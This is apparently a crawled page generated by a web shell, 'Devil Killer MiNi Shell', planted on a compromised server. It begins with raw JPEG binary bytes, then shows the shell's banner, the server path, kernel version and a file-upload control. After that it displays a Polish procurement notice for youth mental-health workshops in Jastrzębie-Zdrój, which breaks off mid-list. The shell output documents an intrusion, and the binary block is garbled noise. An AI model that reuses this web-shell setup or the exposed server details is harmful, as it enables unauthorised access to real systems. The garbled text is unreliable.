JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220504/0014407901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Przeprowadzenie warsztatów/szkoleń dla dzieci i młodzieży z profilaktyki zdrowia psychicznego na terenie Miasta Jastrzębie-Zdrój w ramach projektu „Jastrzębie-Zdrój Miasto-Rodziny” RPO WSL 9.2.5.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003461374</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Opolska 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jastrzębie-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-335</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324349657</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">324740146</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ops.jastrzebie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ops.jastrzebie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przeprowadzenie warsztatów/szkoleń dla dzieci i młodzieży z profilaktyki zdrowia psychicznego na terenie Miasta Jastrzębie-Zdrój w ramach projektu „Jastrzębie-Zdrój Miasto-Rodziny” RPO WSL 9.2.5.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-304970e6-cb89-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00144079</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;Jastrzębie- Zdrój- Miasto Rodziny&#34; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.ops.jastrzebie.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się drogą elektroniczną przy użyciu:<br/>1) miniPortalu https://miniportal.uzp.gov.pl//<br/>2) ePUAPu https://epuap.gov.pl/wps/portal/<br/>3) https://www.ops.jastrzebie.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/ oraz Regulaminie ePUAP.<br/>2. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150MB. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. (zalecany.pdf). Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3. Wymagania techniczne związane z minimum sprzętowym i programowym:<br/>1) Urządzenia teleinformatyczne z dostępem do sieci Internet z systemem operacyjnym: Windows, MacOS lub Linux – z aktualnym wsparciem producenta<br/>2) przeglądarka internetowa: Microsoft Internet Explorer, Mozilla Firefox, Google Chrome - w najnowszej dostępnej wersji<br/>3) założony profil zaufany w systemie ePUAP ( rekomendowany dodatkowy profil firmowy)<br/>4) podpis elektroniczny<br/>a) certyfikat podpisu kwalifikowanego, (dopuszczalne formaty podpisów: PaDES – format.pdf, XaDES –pozostałe formaty),<br/>b) profil zaufany<br/>c) e-dowód .<br/>UWAGA – oferta złożona za pośrednictwem miniPortalu powinna zostać opatrzona właściwym podpisem elektronicznym. Podpis elektroniczny musi zostać złożony bezpośrednio na pliku z ofertą wykonawcy lub na „paczce” dokumentów elektronicznych zawierających ofertę wykonawcy. Opatrzenie właściwym podpisem oferty (lub paczki) następuje przed czynnością jej zaszyfrowania.<br/>4. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>5. W postępowaniu o udzielenie zamówienia, korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>6. Dane postępowania można wyszukać wg ID postępowania lub numerem Ogłoszenia BZP na Liście wszystkich postępowań klikając wcześniej opcje” Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na miniPortalu.<br/>7. W korespondencji kierowanej do Zamawiającego, Wykonawcy powinni posługiwać się numerem Ogłoszenia BZP , ID postępowania.<br/>8. Osobą uprawnioną do porozumiewania się z Wykonawcami jest:<br/>1) w zakresie proceduralnym i merytorycznym: Halina Hanzlik-Grabiec<br/>9. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: sekretariat@ops.jastrzebie.pl<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami<br/>w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">A) Obowiązek informacyjny wynikający z art. 13 ust. 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), (zm. Dz. Urz. UE.L 2018 Nr 127, poz. 2),zwanego dalej: „RODO”:<br/>l) Administratorem danych osobowych przetwarzanych w związku z prowadzonym postępowaniem jest Ośrodek Pomocy Społecznej w Jastrzębiu- Zdroju, adres siedziby administratora: ul. Opolska 9, 44-335 Jastrzębie- Zdrój – zwany dalej w treści niniejszej klauzuli „zamawiającym”.<br/>Kontakt telefoniczny 32 434 96 00 , e-mail: sekretariat@ops.jastrzebie.pl.<br/>2) Dane kontaktowe Inspektora Ochrony Danych są następujące: iodo@ops.jastrzebie.pl<br/>3) Dane osobowe przetwarzane będą przez Zamawiającego na podstawie przepisów prawa - w związku z art. 6 ust. 1 lit. b) oraz c) RODO, w celu prowadzenia przedmiotowego postępowania oraz jego rozstrzygnięcia, jak również zawarcia umowy oraz jej realizacji, a także udokumentowania postępowania i jego archiwizacji.<br/>4) Odbiorcami danych osobowych będą osoby lub podmioty:<br/>1.Ustawowo upoważnione do uzyskania dostępu do dokumentacji postępowania.<br/>2.W przypadku współfinansowania zamówienia ze środków Europejskiego Funduszu Społecznego dane osobowe na podstawie przepisów prawa mogą zostać udostępnione Instytucji Zarządzającej, tj. Zarządowi Województwa Śląskiego.<br/>3. Zamawiający powierza również przetwarzanie danych osobowych określonej grupie podmiotów. Zazwyczaj są to firmy informatyczne wspomagające działalność zamawiającego od strony technicznej.<br/>5)Dane osobowe będą przechowywane przez okres i w sposób oznaczony kategorią archiwalną wskazaną w Jednolitym Rzeczowym Wykazie Akt Ośrodka Pomocy Społecznej w Jastrzębiu-Zdroju, który zgodnie z art. 6 ust. 2 ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz.U. z 2020 r. poz. 164) został przygotowany w porozumieniu z Naczelnym Dyrektorem Archiwów Państwowych.<br/>6)Podanie danych osobowych jest niezbędne do prawidłowego przeprowadzenia postępowania, zawarcia umów i ich dalszej realizacji. Niepodanie danych osobowych spowoduje, że nie będzie możliwe uwzględnienie złożonej oferty i zawarcie umów.<br/>7) W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) Prawa osoby, której dane dotyczą:<br/>1. Na podstawie art. 15 RODO prawo dostępu do danych osobowych.<br/>2. Na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia danych osobowych<br/>3.Na podstawie art. 18 ust.1 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych<br/>4.Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą w Warszawie (00-193) ul. Stawki 2,gdy przetwarzanie danych osobowych naruszy przepisy RODO.<br/>9) Ponadto informujemy, że osobie, której dane osobowe dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>11) Zamawiający informuje, że nie zamierza przekazywać danych osobowych do państwa trzeciego lub organizacji międzynarodowej.<br/>12) Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">B) Realizując obowiązek wynikający z art. 19 ust. 4 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. z 2021 r. poz. 1129) (dalej: PZP) Zamawiający informuje o ograniczeniach stosowania przepisów RODO, o których mowa w art. 19 ust. 2 i 3 ustawy PZP:<br/>1) Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z PZP<br/>2) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.ZP.260.1.2022.JMR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przygotowanie i przeprowadzenie warsztatów (spotkań edukacyjno-profilaktycznych) z zakresu profilaktyki zdrowia psychicznego:<br/>Część I– Warsztaty dla uczennic klas 7 i 8 w szkołach podstawowych. Liczba 18 grup po 12 osób w szkołach podstawowych na terenie Miasta Jastrzębie- Zdrój. Cykl 5 spotkań trwających 2 godziny zegarowe każde. Maksymalna ilość godzin do przepracowania 180h do końca trwania umowy. Zamawiający zastrzega sobie prawo do możliwości zmniejszenia ilości grup w zależności od zapotrzebowania wybranych placówek nie przekraczając 180h zegarowych.<br/>Celem warsztatów jest: zaspokajanie potrzeb rozwojowych takich jak: przynależność do grupy oraz aprobata ze strony rówieśników, wyrażanie siebie i poznawanie swoich mocnych stron. Spotkania mają także pomóc w rozwijaniu umiejętności porozumiewania się i stawiania granic oraz ćwiczenia asertywności. W trakcie zajęć dziewczyny/nastolatki będą uczyły się jak rozpoznać sytuacje niebezpieczne oraz będą poznawały sposoby reagowania w tych sytuacjach. Cel terapeutyczny to budowanie pozytywnego obrazu własnej osoby, zwiększenie poczucia własnej wartości, wzrost poziomu asertywności, umiejętne reagowanie w sytuacjach trudnych.<br/>Poruszana tematyka warsztatów:<br/>- Asertywność + rozpoznawanie własnych potrzeb i stawianie granic;<br/>- Społeczno-kulturowe uwarunkowania atrakcyjności fizycznej oraz stereotypy płci;<br/>- Zapobieganie wykluczeniu z powodu niedoskonałości ciała i negatywnej samooceny;<br/>- Ukształtowanie zdrowego stosunku do własnego ciała, wspieranie samoakceptacji (wewnętrzny krytyk, wewnętrzny przyjaciel) + wizerunek publikowany w mediach społecznościowych;<br/>- Rola mediów społecznościowych w kontekście samoakceptacji ciała i wizerunku z uwzględnieniem możliwych zagrożeń - w tym o charakterze seksualnym;<br/>Warsztaty będą się odbywać w szkołach na ternie Miasta Jastrzębie-Zdrój.<br/><br/>2. Do obowiązków trenera należeć będzie, w szczególności (dla części I i II):<br/>1) Przeprowadzenie warsztatów (spotkań edukacyjno-profilaktycznych) dla wskazanych Uczestników<br/>o wskazanym zakresie przedmiotowym (przykładowe konspekty warsztatów zostaną przekazane<br/>przez Wykonawcę).<br/>2) Opracowanie programu warsztatów bądź aktualizacji programu i dostosowania go do grupy<br/>na podstawie wytycznych dostarczonych przez Zamawiającego.<br/>3) Doręczenie Uczestnikom warsztatów materiałów edukacyjnych przekazanych przez<br/>Zamawiającego.<br/>4) Prowadzenie dokumentacji realizacji umowy na wzorach dostarczonych przez Zamawiającego<br/>i przekazanie całej dokumentacji Zamawiającemu:<br/> prowadzenie sprawozdań ze zrealizowanych warsztatów zawierających informacje:<br/>o dacie i godzinach warsztatów, tematyce, grupie docelowej, liczbie zrealizowanych godzin,<br/> zebranie od instytucji, w których prowadzone są warsztaty, podpisanych potwierdzeń<br/>zrealizowanych warsztatów dla konkretnej grupy uczestników (rejestr warsztatów).<br/>5) Zapewnienie aktywnego zaangażowania Uczestników w trakcie warsztatów.<br/>6) Wykonawca zobowiązany jest do sporządzania dokumentacji fotograficznej z przebiegu każdych warsztatów.<br/>Wykonanie dokumentacji zdjęciowej to minimum 5 zdjęć ze spotkania, w formacie jpg., przy czym<br/>fotografie powinny być wykonywane w taki sposób, aby wszelkie wizerunki osób na fotografiach<br/>stanowiły jedynie tło bądź element szerszej całości. Zdjęcia powinny być porównywalnej wielkości.<br/>Wykonawca będzie zobowiązany do dostarczenia Zamawiającemu, na wskazany adres e-mail, pliku zdjęć w terminie 7 dni od zakończenia realizacji warsztatu z protokołem, po którego zatwierdzeniu<br/>Wykonawca będzie upoważniony do wystawienia rachunku/faktury.<br/><br/>3. Pozostałe obowiązki Wykonawcy (dla części I i II):<br/>1) Realizowanie usługi w sposób staranny, skuteczny i terminowy, zgodnie z ustalonym harmonogramem realizacji usługi;<br/>2) Ewidencjonowanie wykonanych godzin pracy;<br/>3) Utrzymywanie stałego kontaktu z Zamawiającym, w tym bieżące informowanie o wszystkich<br/>zaistniałych problemach;<br/>4) Przestrzeganie obowiązków wynikających z realizacji umowy, przepisów prawnych, procedur,<br/>standardów oraz innych obowiązujących dokumentów;<br/>5) Odpowiadanie na ewentualne pytania w przypadku kontroli realizacji zadania przez instytucje<br/>zewnętrzne bądź Zamawiającego;<br/><br/>4. Do obowiązków Zamawiającego należeć będzie:<br/>1) udostępnienie Wykonawcy wszelkich informacji i dokumentów będących w jego posiadaniu,<br/>niezbędnych do prawidłowej realizacji przedmiotu umowy,<br/>2) ustalenie z Wykonawcą szczegółowego harmonogramu realizacji usługi, konkretnych terminów oraz liczby i rodzaju grup uczestników, dla których Wykonawca przeprowadzi usługę,<br/>3) rekrutacja uczestników na warsztaty,<br/>4) zapewnienie miejsca – sal zajęciowych do realizacji warsztatów, a także podstawowych materiałów warsztatowych (bloki flipchart, markery, kartki, karteczki samoprzylepne, wydrukowane materiały i dokumenty) potrzebnych do przeprowadzenia warsztatów.<br/>5. Wybrany Wykonawca zobowiązuje się w toku realizacji umowy do bezwzględnego stosowania wytycznych horyzontalnych, wytycznych programowych oraz Wytycznych w zakresie kwalifikowalności wydatków w ramach Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności na lata 2014–2020.<br/>6. Warsztaty dla uczennic (część I) odbywać się będą w wybrane dni powszednie od poniedziałku do piątku w godz. 8-16 w szkołach podstawowych z terenu Miasta Jastrzębie-Zdrój, warsztaty dla dzieci i młodzieży (część II) odbywać się będą w wybrane dni powszednie od poniedziałku do piątku w godz. 8-16 , w szkołach podstawowych i ponadpodstawowych z terenu Miasta Jastrzębie-Zdrój.<br/>7. Przedmiot zamówienia realizowany jest w ramach projektu „Jastrzębie –Zdrój Miasto-Rodziny&#34;, którego celem jest wzrost dostępności i jakości usług społecznych na terenie Miasta Jastrzębie- Zdrój mających na celu wsparcie na rzecz dzieci i rodziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>Cena 60 pkt<br/>Dodatkowe kompetencje osoby skierowanej do realizacji zamówienia 40 pkt<br/>Razem 100 pkt<br/>2. W przypadku, gdy do postępowania złożona zostanie tylko jedna oferta niepodlegająca<br/>odrzuceniu, otrzyma ona maksymalną liczbę punktów, równą 100 pkt.<br/>3. W przypadku, gdy do postępowania złożone zostaną co najmniej dwie oferty niepodlegające<br/>odrzuceniu, punkty przyznane danej ofercie zostaną obliczone wg poniższego wzoru:<br/>OLP = C + A<br/>gdzie:<br/>C – ilość punktów uzyskanych w kryterium „cena”.<br/>A – ilość punktów uzyskanych w kryterium „Dodatkowe kompetencje osoby skierowanej do realizacji zamówienia”<br/>4. Zasady przydzielania punktów za poszczególne kryteria są następujące<br/>A.	Kryterium: Cena – C<br/>1) Cena (cena jednostkowa zł za godzinę )- 60 pkt<br/>C= (Najniższa cena jednostkowa / Cena jednostkowa badanej oferty) x 60 pkt<br/>B.	Kryterium „Dodatkowe kompetencje osoby skierowanej do realizacji zamówienia”- Punktacji podlegać będzie posiadanie dodatkowo szkoleń/warsztatów/konferencji/ seminariów potwierdzonych certyfikatem ukończenia w okresie ostatnich dwóch lat : A- 40 pkt<br/>a)	Wykonawca w przeciągu ostatnich dwóch lat odbył 5 i więcej szkoleń/warsztatów/konferencji/ seminariów : 40 pkt<br/>b)	Wykonawca w przeciągu ostatnich dwóch lat odbył 4 szkolenia/warsztaty/konferencje/ seminaria: 30 pkt<br/>c)	Wykonawca w przeciągu ostatnich dwóch lat odbył 3 szkolenia/warsztaty/konferencje/ seminaria: 20 